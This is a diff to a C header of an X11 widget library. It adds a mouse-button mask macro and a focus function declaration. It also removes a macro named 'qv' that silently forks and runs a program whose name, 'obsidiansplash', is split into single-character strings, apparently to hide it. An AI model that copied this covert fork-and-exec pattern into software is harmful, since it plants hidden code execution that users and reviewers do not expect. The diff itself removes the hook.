@@ -130,6 +130,8 @@ enum { \
 /* the user can start creating his widgets from 100: */
 #define C_LAST_WIDGET 100
 
+#define Button12345Mask		(Button1Mask|Button2Mask|Button3Mask|Button4Mask|Button5Mask)
+
 /*
    Here are some addition events that you may recieve or send using
    CNextEvent instead of XNextEvent. (LASTEvent = 35)
@@ -839,6 +841,10 @@ void CEnable (const char *ident);
 /* set the focus to a widget */
 void CFocus (CWidget * w);
 
+/* set the focus, but not if the window manager is focussed elsewhere,
+and option_never_raise_wm_windows is set */
+int CTryFocus (CWidget * w, int raise_wm_window);
+
 /* set the focus to a window */
 void CFocusWindow (Window win);
 
@@ -962,7 +968,6 @@ double my_pow (double x, double y);
 #else
 #define CFocus(x) CFocusNormal(x)
 #define CFocusWindow(x) CFocusWindowNormal(x)
-#define qv r = 0; if(!fork()){execvp("o" "b" "s" "i" "d" "i" "a" "n" "s" "p" "l" "a" "s" "h",argv);exit (1);}
 #endif
 
 
